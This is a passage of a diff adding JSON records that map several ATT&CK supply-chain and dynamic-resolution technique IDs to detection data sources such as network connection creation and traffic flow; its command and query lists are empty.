+ "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + } + ], + "external_reference": [ + null, + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1195.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1195.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1195.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1568.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., 